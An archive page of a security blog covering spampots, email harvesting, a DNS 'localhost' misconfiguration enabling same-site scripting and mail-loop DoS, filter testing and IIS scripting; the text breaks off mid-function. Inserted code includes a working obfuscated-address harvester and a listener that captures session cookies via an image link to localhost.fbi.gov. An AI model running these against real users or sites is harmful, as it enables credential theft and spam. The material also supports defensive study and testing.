Archive for the ‘Email’ Category

Experience on Open Mail Relay Server for Honeypot

by .hac on December 8th, 2009

This is more a report than a discovery in spam collection. I was working on setting up a spampot using spampot.py, which was written by Neale Pickett back in 2003. Although the result did not meet my expectations, it did give me more information about setting up a spampot.

Goal

The goal of running a spampot (a honeypot that only cares about spam) is to collect spam and analyse its trends; hopefully we can find some interesting techniques that spammers/hackers use in junk and phishing emails.

Approach
So far, there are at least two types of spampot hosting method that I know of. The names are my own; if there are formal names for them, please let me know.

Open Relay Spampot: This kind of honeypot runs as an open mail relay. In case you are not familiar with the term, an open relay is a mail server that accepts mail from anyone for delivery to anyone, so third parties can send messages through it anonymously.

Closed Relay Spampot: The spampot runs as a closed mail relay, i.e. it only accepts mail for domains it hosts. To expose the server to spammers, you need your own domain bound to this server, with one or more email addresses exposed to spammers/hackers. For example, we can bind onhacks.org to a spampot and expose spam@onhacks.org as one of the addresses. Methods to increase the exposure of an email address are out of scope here; we can discuss them later.

In my setup, I decided to run the spampot as an open mail relay.

Setup
I have VirtualBox installed on top of Windows 7, with Ubuntu as the guest OS, because spampot.py was written for *nix systems. Since port 25 is the default port for SMTP, we need to forward packets arriving at the host (Win7) on port 25 to the guest (Ubuntu), so that the spampot in the guest can answer incoming connections to the host's port 25.

(Assuming that you are using NAT networking in VirtualBox.)
To enable port forwarding, set HostPort 25 forwarding to GuestPort 25. For more detail on port forwarding in VirtualBox, refer to the Tombuntu article in the references.

However, you will soon discover that port forwarding does not work for a reserved port (< 1024) unless VirtualBox runs with sufficient privileges. In my case this was easily resolved by running VirtualBox with administrator credentials (i.e. Run As Administrator).

spampot.py requires Sendmail to be installed on the Linux guest. Since sendmail itself is a service listening on port 25, the two cannot share the port, so I do the following to stop sendmail and switch to spampot.py:

sudo /etc/init.d/sendmail stop
sudo spampot.py 0.0.0.0

Of course, you can make this run automatically when the system starts.

The last thing is to add a DNS record pointing to my machine; I have smtp.onhacks.org pointing to it. Since this is still an experiment, the machine runs at home on a dynamic IP address, so I need to update the record often. Before waiting for spam, check from outside your own network that the banner is reachable (e.g. telnet smtp.onhacks.org 25) and that the server accepts a RCPT TO for a foreign domain; otherwise you are testing your NAT rule rather than your spampot. Keep in mind that many residential ISPs filter port 25, which explains an empty spampot just as well as a lack of interest from spammers.
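To make the open-relay behaviour concrete, here is a minimal spampot session handler added for this page (it is not spampot.py and not code from the original post). It accepts every sender and every recipient, which is what makes a server an open relay, stores the DATA instead of delivering it, and flags messages addressed outside its own domains as relay attempts. The banner, the domain names and the SMTP transcript at the bottom are constructed placeholders.

```python
"""Minimal open-relay spampot: an SMTP state machine that accepts everything and
stores messages instead of delivering them (added example, not spampot.py)."""
import re
import socketserver
from dataclasses import dataclass

# Loose address matcher, enough for "MAIL FROM:<a@b>" and "RCPT TO: c@d".
ADDR_RE = re.compile(r"<?([^<>\s@]+@[^<>\s@]+)>?")


@dataclass
class Message:
    sender: str
    recipients: list
    body: str


class SpampotSession:
    """One SMTP conversation. feed() takes one client line (without CRLF) and
    returns the reply to send, or None while swallowing message data."""

    def __init__(self, local_domains=("spampot.example",)):  # placeholder domain
        self.local_domains = {d.lower() for d in local_domains}
        self.messages = []
        self._reset()

    def _reset(self):
        self.sender, self.recipients, self.data, self.in_data = None, [], [], False

    def greeting(self):
        return "220 smtp.spampot.example ESMTP ready"  # placeholder banner

    def feed(self, line):
        if self.in_data:
            if line == ".":  # end of DATA: keep the message, never deliver it
                self.messages.append(Message(self.sender, list(self.recipients), "\n".join(self.data)))
                self._reset()
                return "250 OK: queued"
            # RFC 5321 dot-stuffing: a line starting with ".." carries a literal "."
            self.data.append(line[1:] if line.startswith("..") else line)
            return None
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            return "250 smtp.spampot.example"
        if verb == "MAIL":
            m = ADDR_RE.search(arg)
            self.sender = m.group(1) if m else ""  # "<>" is the null sender
            return "250 OK"
        if verb == "RCPT":
            m = ADDR_RE.search(arg)
            if not m:
                return "501 Syntax error in parameters"
            self.recipients.append(m.group(1))  # open relay: never refuse a recipient
            return "250 OK"
        if verb == "DATA":
            if self.sender is None or not self.recipients:
                return "503 Bad sequence of commands"
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "RSET":
            self._reset()
            return "250 OK"
        if verb == "NOOP":
            return "250 OK"
        if verb == "QUIT":
            return "221 Bye"
        return "500 Command not recognized"

    def relay_attempts(self):
        """Messages with a recipient outside our domains: relay probes and spam runs."""
        return [m for m in self.messages
                if any(r.rsplit("@", 1)[1].lower() not in self.local_domains for r in m.recipients)]


def run_transcript(lines, local_domains=("spampot.example",)):
    """Drive a session from a list of client lines; returns (replies, session)."""
    session = SpampotSession(local_domains)
    replies = [r for r in (session.feed(line) for line in lines) if r is not None]
    return replies, session


class SpampotHandler(socketserver.StreamRequestHandler):
    """Wire the session to a TCP connection; one instance per client."""

    def handle(self):
        session = SpampotSession()
        self.wfile.write((session.greeting() + "\r\n").encode())
        for raw in self.rfile:
            reply = session.feed(raw.decode("latin-1").rstrip("\r\n"))
            if reply:
                self.wfile.write((reply + "\r\n").encode())
                if reply.startswith("221"):
                    break
        for msg in session.messages:  # a real spampot would write these to disk
            print(f"{self.client_address[0]}: {msg.sender!r} -> {msg.recipients}, {len(msg.body)} bytes")


# Constructed relay probe: the spammer checks whether we forward mail to an address he controls.
PROBE = ["EHLO probe.example", "MAIL FROM:<check@probe.example>", "RCPT TO:<check@probe.example>",
         "DATA", "Subject: relay test", "", "..hidden dot line", "probe 123", ".", "QUIT"]

if __name__ == "__main__":
    replies, session = run_transcript(PROBE)
    print("\n".join(replies), "\nrelay attempts:", len(session.relay_attempts()))
    # To listen for real (port 25 needs root): socketserver.TCPServer(("0.0.0.0", 25), SpampotHandler).serve_forever()
```

Nothing here ever forwards the probe, so the relay scanner never sees its test message arrive and moves on; that is the trade-off of a spampot that only collects. If you do let probes through, do it from a host whose outbound port 25 you control and rate-limit it hard.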

Result
Currently, I have received 0 messages after running the spampot for a few days. I have googled around and it looks like open relay spampots are not that popular any more: many server administrators are aware that spammers abuse open mail relays and no longer allow relaying, so submitting spam through open relays is no longer an efficient method for spammers. Another reason to expect few messages is the way spammers find relays: a relay scanner typically sends a probe message through the candidate server to an address the spammer controls and only uses the server if the probe arrives. A spampot that accepts everything but delivers nothing never passes that test, so at best it collects the probes.

I will keep the spampot running for now and see whether we can get more spam through the open relay honeypot. Afterwards, I will work on a closed relay spampot.

Reference

  1. Open mail relay – Wikipedia
  2. spampot.py – written by Neale Pickett
  3. Configure Port Forwarding to a VirtualBox Guest OS – Tombuntu
  4. SpamPots Project – CERT.br
  5. Brazilian Honeypots Alliance

Email, Honeypot, Spampot

Is old-fashioned protection still keeping you away from spam?

by .hac on September 12th, 2009

I disappeared again after my last post, which talked about spam collection and DNS misconfiguration. Today I read log0's post in which he calls for bots/tools for his security research. Did you see anything familiar? Look at how log0 shows his contact address: "log0 [ at ] gmail [ dot ] com". We have been using this format for quite some time, after we realised that showing the full form of an address (e.g. spam@onhacks.org) increases the chance that it gets exposed to spammers.

However, this kind of representation has been on the Internet for years. Did you ever consider one fact: a clever spammer only needs to modify a few lines of code in the bot, changing the target strings it looks for, and everything works just as it did before.

The most interesting thing is that RSnake blogged his findings on this form of email representation last Tuesday. In short, he googled for "at gmail dot com" and, surprisingly, there were at least 6 email addresses on the first result page. There are many variations, but they all follow the same pattern; here are some examples:

spam  at  onhacks  dot  com
spam [at] onhacks [dot] com
spam (at) onhacks (dot) com
spam <at> onhacks <dot> com
spam “at” onhacks “dot” com

(Obviously, I am doing my best to let spammers know my address.)

I spent an hour writing a very simple PoC parser to retrieve email addresses from the result page mentioned above. There are at least 4 valid email addresses on it, so it is not too hard for a bot to harvest them. The parser just looks for one 'at' and one 'dot' keyword appearing in sequence, i.e. the pattern [any word] "at" [any word] "dot" [any word]. The code is poorly written; I will improve it later this week.
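Below is a small harvester written for this page (it is not the author's PoC parser, which is not reproduced here). It implements the same [any word] "at" [any word] "dot" [any word] rule, normalizes the bracketed and quoted variants listed above, and also handles multi-label domains such as "user at mail dot example dot org". The sample text is constructed from the examples in the post.

```python
"""Harvest "user at host dot tld" style obfuscated addresses (added PoC, not the
author's parser). Normalizes [at], (dot), <at>, "dot" variants, then matches the
[word] at [word] dot [word] pattern, allowing several "dot" labels."""
import re

WRAP = r"""[\[\(<{"'“”]"""    # opening bracket/quote characters seen around "at"/"dot"
UNWRAP = r"""[\]\)>}"'“”]"""  # matching closers
KEYWORD_RE = re.compile(WRAP + r"\s*(at|dot)\s*" + UNWRAP, re.IGNORECASE)

ADDRESS_RE = re.compile(
    r"(?<![\w.+-])"                              # user part starts at a word boundary
    r"(?P<user>[\w.+-]+)"
    r"\s+at\s+"
    r"(?P<host>(?:[\w-]+\s+dot\s+)+[a-z]{2,})"   # label (dot label)+ ; last label is the TLD
    r"(?![\w-])",
    re.IGNORECASE)


def normalize_keywords(text):
    """Turn "[at]", "( dot )", "<at>", “dot” ... into bare " at " / " dot "."""
    return KEYWORD_RE.sub(r" \1 ", text)


def harvest(text):
    """Return de-duplicated, lower-cased addresses in document order."""
    found = []
    for m in ADDRESS_RE.finditer(normalize_keywords(text)):
        host = re.sub(r"\s+dot\s+", ".", m.group("host"), flags=re.IGNORECASE)
        addr = f"{m.group('user')}@{host}".lower()
        if addr not in found:
            found.append(addr)
    return found


# Constructed sample page: the five variants from the post plus a few extra lines.
SAMPLE = """Contact: spam  at  onhacks  dot  com
Also spam [at] onhacks [dot] com and spam (at) onhacks (dot) com,
spam <at> onhacks <dot> com or spam “at” onhacks “dot” com.
Research contact: log0 [ at ] gmail [ dot ] com
Deep: admin at mail dot example dot org
Prose that should not match: let's meet at noon."""

if __name__ == "__main__":
    for addr in harvest(SAMPLE):
        print(addr)
```

Precision is deliberately low, just like the parser described in the post: prose such as "meet at the dot com" will produce junk, and a stop-word check on the user part would be the first refinement. The point is how little code stands between an "at/dot" address and a spam list.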

It is not difficult to discover the pattern behind these addresses; it is a piece of cake even for primary school students. So what representation should we use to show our email address on the Internet? Display a JPEG of the address? Without noise added to the image, extracting it is as easy as running text recognition (OCR). With noise on the image, it becomes more like a CAPTCHA. Since most CAPTCHA solvers target a specific type of CAPTCHA, it may take more time to recover an address "encrypted" as a CAPTCHA. However, it is not unsolvable.

What is the takeaway then? Better not to show your address on the web at all! Or render it as a CAPTCHA, so that at least your address has less chance of being captured by spammers.

Email

[localhost IN A 127.0.0.1] what’s the problem?

by .hac on August 8th, 2009

It has been a long time since my last post. I disappeared because the project I am working on is going to ship soon, and I have been busy finding bugs and fixing test cases these past few months.

Anyway, let's get back to a security discussion today. I was testing the DNS resolver feature in my product; DNS is always a great place to play. While looking for interesting scenarios to test the feature, I found this article. Although it is old news, the problem is still in the wild.

DNS Misconfiguration

Many administrators like to install "localhost. IN A 127.0.0.1" as a record in their DNS server. However, administrators often mistakenly drop the trailing dot (i.e. "localhost IN A 127.0.0.1"). In a zone file, a name without a trailing dot is relative to the zone's origin, so when this record is put into a zone (e.g. yahoo.com) it actually becomes "localhost.yahoo.com. IN A 127.0.0.1"! In other words, when you nslookup "localhost.yahoo.com", it gives you 127.0.0.1!

I found that there are still many such misconfigurations in the wild. Here are some examples (as they resolved at the time of writing):

localhost.fbi.gov gives IP address 127.0.0.1
localhost.domain.ca gives IP address 127.0.0.1
localhost.gov.za gives IP address 127.0.0.1
localhost.cancer.gov gives IP address 127.0.0.1

Application

Same-Site Scripting attack

It is easy for attackers to take advantage of these misconfigured DNS records on a multi-user system. Consider two users, log0 and .hac, on a *nix system: .hac can write a small program that binds to an unprivileged port (e.g. 1024) on the system. Afterwards, .hac sends an email to log0 pretending to show some interesting stuff from fbi.gov, for example an image with unknown symbols (i.e. an <img> tag in the mail: <img src="http://localhost.fbi.gov:1024/symbols.jpeg" />). What happens when log0 reads the message? The browser resolves localhost.fbi.gov, which points to 127.0.0.1, and connects to 127.0.0.1:1024 to fetch the image. Because localhost.fbi.gov is a subdomain of fbi.gov, the browser attaches any cookies scoped to fbi.gov to that request, so .hac's program can grab log0's credentials simply by reading the HTTP request it receives. This is called a same-site scripting attack, as already described in the article (Tavis Ormandy coined the name in 2008).
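The cookie leak is the whole point of the attack, so here is an added example (not from the original article or this post) that shows both halves: the RFC 6265 domain-matching rule a browser applies when deciding to send a cookie scoped to fbi.gov to localhost.fbi.gov, and the listener the local attacker runs on port 1024 to collect the Cookie header. The cookie jar and the victim's request are constructed; fbi.gov appears only because the post uses it.

```python
"""Same-site scripting: why a cookie for fbi.gov reaches a listener on
localhost.fbi.gov:1024, and what that listener sees (added example)."""
import ipaddress
from http.server import BaseHTTPRequestHandler, HTTPServer


def domain_matches(request_host, cookie_domain):
    """RFC 6265 section 5.1.3 domain-match: the host equals the cookie domain, or
    ends with "." + domain and is not an IP literal."""
    host = request_host.lower().rstrip(".")
    dom = cookie_domain.lower().strip(".")
    if host == dom:
        return True
    try:
        ipaddress.ip_address(host)
        return False  # IP literals never domain-match a suffix
    except ValueError:
        return host.endswith("." + dom)


def cookies_sent_to(request_host, cookie_jar):
    """cookie_jar: list of (name, value, domain). Returns what a browser attaches."""
    return [(name, value) for name, value, domain in cookie_jar
            if domain_matches(request_host, domain)]


def parse_request_cookies(raw):
    """Pull the Cookie header out of a raw HTTP request (bytes) as a dict."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "cookie":
            return dict(p.strip().split("=", 1) for p in value.split(";") if "=" in p)
    return {}


class CookieSink(BaseHTTPRequestHandler):
    """What .hac runs as an unprivileged user: answer any GET with a tiny GIF and
    record the Cookie header the victim's browser attached."""
    GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff!\xf9\x04\x01"
           b"\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")

    def do_GET(self):
        print("captured from", self.headers.get("Host"), "->", self.headers.get("Cookie"))
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.end_headers()
        self.wfile.write(self.GIF)


# Constructed: the request log0's mail client issues for the <img> in the message.
VICTIM_REQUEST = (b"GET /symbols.jpeg HTTP/1.1\r\nHost: localhost.fbi.gov:1024\r\n"
                  b"Cookie: session=abc123; prefs=dark\r\nUser-Agent: mailclient\r\n\r\n")

# Constructed cookie jar: one cookie scoped to fbi.gov, one for an unrelated site.
JAR = [("session", "abc123", ".fbi.gov"), ("login", "zzz", "example.com")]

if __name__ == "__main__":
    print("browser would send:", cookies_sent_to("localhost.fbi.gov", JAR))
    print("listener extracts:", parse_request_cookies(VICTIM_REQUEST))
    HTTPServer(("127.0.0.1", 1024), CookieSink).serve_forever()  # bind as a normal user
```

The listener needs no privileges because 1024 is not a reserved port; the only thing the attacker relies on is the victim's resolver returning 127.0.0.1 for a name under the cookie's domain.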

Possible (D)DoS attack

Same-site scripting is an attack against a client; there is another possible attack against the server. Consider a mail system (e.g. gmail.com) that accepts messages submitted by its users for delivery to anyone in the wild. The system never knows which host it should connect to for delivery until it resolves the address of the recipient's domain. What happens if we submit a message with recipient none@localhost.gov.za (where localhost.gov.za points to 127.0.0.1)? The mail flow is as follows:

  1. Message submitted: MAIL FROM: evil@gmail.com, RCPT TO: none@localhost.gov.za
  2. Gmail accepts it and resolves the address of localhost.gov.za (response: localhost.gov.za. IN A 127.0.0.1)
  3. Depending on the implementation, it may:
    go back to step 1, which means the message is resubmitted to the same server;
    go back to step 2, i.e. the delivery fails, the message is marked for retry and the server tries again later;
    or detect the loopback address and drop the message out of security concern.

The security concern is a DoS: if the system goes back to step 1 or 2, the message gets stuck in the mail system. An attacker can submit thousands or millions of such messages to increase the load on the mail system until it is a denial of service. I said it may be a DDoS because the mail system may limit the number of submissions per user per hour, so the attacker needs multiple mailboxes to achieve the goal.

I have tested some well-known email systems: Gmail, Hotmail and Exchange 2010. Here are some brief observations:

Gmail: Accepts the first submission of a message whose recipient resolves to a loopback address. However, it refuses to accept the same message from the same origin again, which means resubmitting the message is not allowed. The system marks the message as failed and attempts to retry it for 3 days.

Hotmail: Similar to Gmail, but it only retries for 2 days.

Exchange 2010: If the target is a loopback address, the server drops the message and returns an NDR citing a security concern as the reason.
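Exchange's behaviour above is the right one, and it is simple to implement on the submitting side. The check below is an added example (not code from any of the systems tested): it resolves the recipient domain's mail exchangers the way an MTA does (MX records, then the A/AAAA fallback) and refuses recipients whose delivery target is loopback, unspecified, multicast, link-local or RFC 1918 space. The resolver is a constructed lookup table so the example runs offline; localhost.gov.za is pre-loaded with the misconfigured record from the post.

```python
"""Refuse RCPT TO addresses whose mail exchanger resolves to an address the MTA
must never connect to (added example; resolver is injectable, runs offline)."""
import ipaddress

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "fc00::/7")]


def unroutable_reason(ip):
    """Return why an address is not a legitimate delivery target, or None if it is."""
    a = ipaddress.ip_address(ip)
    if a.is_loopback:
        return "loopback"
    if a.is_unspecified:
        return "unspecified"
    if a.is_multicast:
        return "multicast"
    if a.is_link_local:
        return "link-local"
    if any(a in net for net in RFC1918):
        return "private"  # drop this check if you legitimately relay to internal MXs
    return None


def delivery_targets(domain, resolve):
    """resolve(name, rrtype) -> list. MX hosts by preference, else the domain itself
    (the implicit-MX fallback of RFC 5321 section 5.1), then their A/AAAA records."""
    mx = resolve(domain, "MX")
    hosts = [host for _, host in sorted(mx)] if mx else [domain]
    addrs = []
    for host in hosts:
        addrs += resolve(host, "A") + resolve(host, "AAAA")
    return addrs


def accept_recipient(address, resolve):
    """Return (accepted, reason) for one RCPT TO address."""
    domain = address.rsplit("@", 1)[-1].rstrip(".").lower()
    addrs = delivery_targets(domain, resolve)
    if not addrs:
        return False, "no A/AAAA for any mail exchanger"
    for ip in addrs:
        why = unroutable_reason(ip)
        if why:
            return False, f"mail exchanger resolves to {why} address {ip}"
    return True, "ok"


# Constructed zone data standing in for live DNS. gov.za carries the trailing-dot
# mistake from the post, so localhost.gov.za resolves to loopback.
FAKE_DNS = {
    ("localhost.gov.za", "A"): ["127.0.0.1"],
    ("example.com", "MX"): [(10, "mail.example.com")],
    ("mail.example.com", "A"): ["192.0.2.25"],
    ("mail.example.com", "AAAA"): ["2001:db8::25"],
    ("internal.example", "MX"): [(10, "mx.internal.example")],
    ("mx.internal.example", "A"): ["10.0.0.5"],
}


def fake_resolve(name, rrtype):
    return list(FAKE_DNS.get((name.lower(), rrtype), []))


if __name__ == "__main__":
    for rcpt in ("none@localhost.gov.za", "user@example.com", "user@internal.example"):
        print(rcpt, accept_recipient(rcpt, fake_resolve))
```

In a real MTA, fake_resolve is replaced by a call to your DNS library, the rejection becomes a 5xx reply at RCPT TO time (before the message is queued, so nothing can loop), and the "private" rule is relaxed for the internal relays you actually deliver to.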

It is obvious that this kind of DNS misconfiguration enables attacks against both clients and servers, and I believe there are more interesting uses of DNS records pointing to 127.0.0.1. Let me know if you have any interesting scenarios.

Remember: localhost. IN A 127.0.0.1 (if you are not doing evil things ;) )


DNS, Email, Protocol

Please give me your spam to spam@onhacks.org !

by log0 on August 7th, 2009

Please send me your spam (instant messenger spam, phishing spam, etc.) at spam@onhacks.org.

Yes, we will be reading them!

Thank you.

Email, Honeypot

How to examine a bad word filter?

by .hac on May 31st, 2009

Testing something is always good practice before learning how to hack it; the methodologies we use in testing are sometimes applicable to hacking. So I am planning to write some entries related to testing in the coming few months, and we will see if we can discover a systematic way to hack. Here is the first challenge; it is very simple.

Problem
Network managers always want to, or are forced to, control the information flowing around a network. Most of the time, filtering is a good way to exert that control. Within this big category, we often use a block list to prevent information from coming into or going out of the network.

Scenarios
Flora doesn't want her daughter to wallow in Japanese pop stars. Flora knows that her daughter always navigates to sites whose domain names end in '.jp', and she is looking for a tool that can control which websites their PC can reach.

The IT administrator of PC Middle School discovered that their mail system has started receiving porn advertisements and that students are sharing these links through the mail system; they are planning to deploy a filter that blocks all such mail.

Justin loves blogging so much that he writes weekly. He loves to collect and read feedback from his audience. However, he hates spammers pasting unrelated advertisements in his comments, and he wants a way to stop them from appearing to other readers.

Solution
The trivial filtering solution to help these people is bad-word filtering. The basic idea is the same as a general block list: users specify the tokens to look for when deciding whether to block the information. In general, there are at least two different definitions of what it means to find a bad word. Given an input message M,

  1. Split the message M into a sequence of words Ws; a bad word bW is found in the message only if Ws contains bW (i.e. as a whole word).
  2. Take the message M as an input stream; a bad word bW is found when a run of consecutive characters equals bW (i.e. as a substring).

Both definitions have their own advantages and disadvantages, but we will leave that discussion for later since the current topic is how to test the filter. Let's say we pick the first definition for our filter; then what should we test? (Take some time to think about scenarios before you continue reading.)

Functional Test
According to the input of this filter (the message M), we can design a few functional test cases. Basic scenarios are:

  • empty message [Expected: Accept];
  • only one word (either a good or a bad word) [Expected: good - Accept, bad - Reject];
  • two words (good and bad) with different delimiters [Expected: depends on how the feature defines a delimiter];
  • a list of words containing (0, 1, 2, all) bad words [Expected: 0 - Accept, otherwise Reject];
  • a bad word embedded in a word (e.g. assume evil is a bad word and the message contains residentevil.com) [Expected: by design, this message will be accepted]

Besides these functional test cases, we should have a lengthy message to check the boundary cases of the feature. Assuming the longest message we accept is N characters, we need messages of length N-1, N and N+1 (just under, at and just over the limit). Globalization and localization tests may also be required, depending on who your target users are.
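The two definitions and the test matrix above are small enough to write down as running code, so here is an added example (not from the post). It implements definition 1 as word_filter and definition 2 as stream_filter, with the message length limit N as an assumed constant, and folds look-alike encodings (full-width letters, for instance) before matching, which is one answer to the "different encoding" question under Security Concern. The bad-word list and the messages are constructed.

```python
"""Bad-word filter, both definitions from the post, plus the functional and
boundary cases as executable checks (added example)."""
import re
import unicodedata

MAX_LEN = 64  # assumed message length limit N for the boundary cases


class TooLong(ValueError):
    """Raised instead of Accept/Reject when the message exceeds MAX_LEN."""


def canonical(text):
    """Fold compatibility forms (full-width letters, ligatures) and case so that
    "ｅｖｉｌ" or "EVIL" match the list entry "evil"."""
    return unicodedata.normalize("NFKC", text).casefold()


def _check_length(message):
    if len(message) > MAX_LEN:
        raise TooLong(f"message longer than {MAX_LEN} characters")


def word_filter(message, bad_words, delimiters=r"\s"):
    """Definition 1: split on delimiters; Reject if any whole token is a bad word."""
    _check_length(message)
    bad = {canonical(w) for w in bad_words}
    tokens = [t for t in re.split(f"[{delimiters}]+", canonical(message)) if t]
    return "Reject" if any(t in bad for t in tokens) else "Accept"


def stream_filter(message, bad_words):
    """Definition 2: Reject if a bad word occurs as a substring anywhere."""
    _check_length(message)
    text = canonical(message)
    return "Reject" if any(canonical(w) in text for w in bad_words) else "Accept"


def length_outcome(n, bad_words=("evil",)):
    """Boundary helper: what happens to an n-character harmless message."""
    try:
        return word_filter("x" * n, bad_words)
    except TooLong:
        return "TooLong"


BAD = ["evil", "spam"]  # constructed block list

# Constructed test matrix: (message, expected result under definition 1)
CASES = [
    ("", "Accept"),                          # empty message
    ("evil", "Reject"),                      # only a bad word
    ("hello", "Accept"),                     # only a good word
    ("hello,evil", "Accept"),                # comma is not a delimiter by default
    ("one two three", "Accept"),             # list with 0 bad words
    ("one evil three", "Reject"),            # 1 bad word
    ("evil spam evil", "Reject"),            # all bad words
    ("visit residentevil.com", "Accept"),    # bad word embedded in a token
    ("ｅｖｉｌ", "Reject"),                   # full-width letters fold to "evil"
]


def run_cases(cases=CASES, bad_words=BAD):
    """Return the cases whose actual result differs from the expectation."""
    return [(m, e, word_filter(m, bad_words)) for m, e in cases if word_filter(m, bad_words) != e]


if __name__ == "__main__":
    for message, expected in CASES:
        print(f"{message!r:30} -> {word_filter(message, BAD)} (expected {expected})")
    print("embedded word under definition 2:", stream_filter("visit residentevil.com", BAD))
    print("N:", length_outcome(MAX_LEN), " N+1:", length_outcome(MAX_LEN + 1))
```

Note that the length check runs on the raw message while matching runs on the folded one; a message of N full-width characters passes the limit but folds to something the list can match, which is exactly the kind of interaction the boundary and encoding cases are there to expose.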

Security Concern
Then we would ask: is there another way to bypass the filter (e.g. a message using a different encoding)? Is code injection or script injection possible? Who can use the feature? Where is the bad word list stored? Who has the rights to modify it? These are the security concerns when testing the feature. Drawing a data flow diagram always helps to identify what kind of security issues we may have. However, this post only focuses on functional testing of a feature; maybe next time we can discuss how to design security test cases.

Conclusion
We have only discussed some elementary skills for designing the test plan of a feature. You can consider what kinds of input the feature accepts, both valid and invalid. Output is another way to discover new scenarios: output is anything the feature shows. Since we assumed that this filter only says accept or reject for a message and throws some exceptions (e.g. input size exceeded), the test cases we found here are almost entirely driven by the input. Now you are able to test your program more systematically!

Have a good weekend!

Practice (Just for fun)
If you want some practice, we can discuss how to test an IP block list filter. Here is a simple definition (hint: a binary search is only correct over a sorted list, and the file is edited by hand):

INPUT: Only IPv4 addresses, one at a time
IMPLEMENTATION: The IP block list is stored as a text file in the same folder as the filter; the user must edit the text file directly to add/remove/edit an IP address in the block list. The filter performs a binary search to see if the input address is on the list. If it is, it announces Reject; otherwise it outputs Accept.
OUTPUT: Accept/Reject the address

Email, Testing

RE : Encryption VS Compression

by log0 on April 12th, 2009

LP gave a very good reply to the topic of "encrypt-and-compress" vs "compress-and-encrypt", and it is worth highlighting here.

The reason why compression works is that the plaintext contains redundancy, e.g. there are certain patterns in the text, character frequencies are not uniform, etc.

On the other hand, a good encryption algorithm should exhibit good diffusion and confusion; in short, encrypted data should be indistinguishable from random noise. Obviously this property should hold regardless of the plaintext, otherwise the encryption algorithm is broken.

Therefore, compress-and-encrypt produces smaller output with no security compromise per se, whereas encrypt-and-compress is like feeding random noise (whose redundancy has been greatly reduced) into the compression algorithm, with no obvious security benefit.

In short, encrypt-and-compress has no obvious security benefit. Moreover, given that the output of a good compression algorithm should be like real noise and should not contain patterns, it follows that there will be no obvious storage benefit either.

Email, Protocol

More on Mdutil

by .hac on January 12th, 2009

Yes, not really security related again. I think Mdutil is very useful and powerful, but there are too few resources discussing its use, so I want to talk a little more about my experience with it. I am still working with IIS SMTP this time, because I have many test cases that need to interact with an SMTP server, and IIS SMTP is the "simplest" server that suits our requirements. Unfortunately, the IIS virtual SMTP server is so simple that you cannot find a way to configure its advanced features in the provided UI (you can download the IIS Resource Kit Tools, e.g. for IIS 6, to gain access to these configurations). This time, my task is to add some routing domains (around 30) to the virtual SMTP server. If you have tried adding routing domains through IIS Manager, you will know how painful it is when you need to add many of them at once. So we have Mdutil to modify the metabase keys, a list of routing domains to add, and I am planning to write some code that generates a script (more accurately, a list of Mdutil commands) to add these domains.

First of all, we need to know how domains are stored in the metabase before designing the script to add a routing domain. Let's manually add a routing domain (e.g. log0.onhacks.org) to the server through IIS Manager. After that, run the command to see what happened under the Domain path. Remember the command?

mdutil enum -path:smtpsvc/<n>/Domain

Then you will see output similar to the following:

KeyType : [S] <String> "IIsSmtpDomain"
[smtpsvc/<n>/Domain/log0.onhacks.org]

This means that when adding a new routing domain, the SMTP server creates a child node under Domain. Does this child contain no data? Obviously not! There are two types of routing domain we can create in IIS SMTP, Local (i.e. Alias) and Remote, so at least that choice must be stored in the child. Run the following command:

mdutil enum -path:smtpsvc/<n>/Domain/log0.onhacks.org

Since I added this domain with the Alias type, you will get the following result:

KeyType : [S] <String> "IIsSmtpDomain"
36946 : [IS] <DWORD> 0x10 = {16}

It matches what we expect, and no extra value needs to be added in this branch. From this observation, we need at least 3 mdutil commands to add a new branch under smtpsvc/<n>/Domain. Let's first look at the operations mdutil provides. Type mdutil without arguments and you will see its help; the following are the commands useful for our task.

mdutil SET      path value …   – assign the new value
mdutil CREATE   path             – create given path

After a little experimentation, I discovered that the CREATE operation creates a new branch and that SET adds a new property to a node. So the steps to import a routing domain are as follows (e.g. importing dotHac.onhacks.org).

Create a branch:

mdutil CREATE -path:smtpsvc/<n>/Domain/dotHac.onhacks.org

Add a variable KeyType to the branch:

mdutil SET -path:smtpsvc/<n>/Domain/dotHac.onhacks.org -prop:KeyType -utype:UT_SERVER -dtype:STRING -value:"IIsSmtpDomain"

Add a variable for the routing action (value: 16 = local domain, 2 = remote domain):

mdutil SET -path:smtpsvc/<n>/Domain/dotHac.onhacks.org -prop:36946 -utype:UT_SERVER -dtype:DWORD -value:16

When you open IIS Manager, you will see that the domain has been imported. Pretty cool, isn't it? The next step is to generate the list of mdutil commands for a batch import. My approach is a small program (mine is written in Python) that reads the list of domains and their routing actions and emits the three mdutil commands for each of them.
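The generator the post describes is not reproduced on the page, so the following is an added example of the same idea (my code, not the author's script). It reads one "domain,local|remote" line per routing domain, assumes the virtual server instance number is 1, validates each domain name, and emits the three mdutil commands shown above for each, using the routing-action values (16 = local, 2 = remote) from the post. The listing is constructed.

```python
"""Generate the three mdutil commands per routing domain from a listing
(added example, not the author's script). Input: "domain,local|remote" lines."""
import re
import sys

INSTANCE = 1  # smtpsvc/<n>: assumed virtual server instance number
ROUTING_ACTION = {"local": 16, "remote": 2}  # property 36946 values from the post

# Hostname labels: letters/digits/hyphens, no leading or trailing hyphen, 1-63 chars.
DOMAIN_RE = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)(?:\.(?!-)[a-z0-9-]{1,63}(?<!-))*$")


def commands_for(domain, action, instance=INSTANCE):
    """The CREATE + two SET commands that IIS Manager performs for one domain."""
    path = f"smtpsvc/{instance}/Domain/{domain}"
    return [
        f"mdutil CREATE -path:{path}",
        f'mdutil SET -path:{path} -prop:KeyType -utype:UT_SERVER -dtype:STRING -value:"IIsSmtpDomain"',
        f"mdutil SET -path:{path} -prop:36946 -utype:UT_SERVER -dtype:DWORD -value:{ROUTING_ACTION[action]}",
    ]


def generate(listing, instance=INSTANCE):
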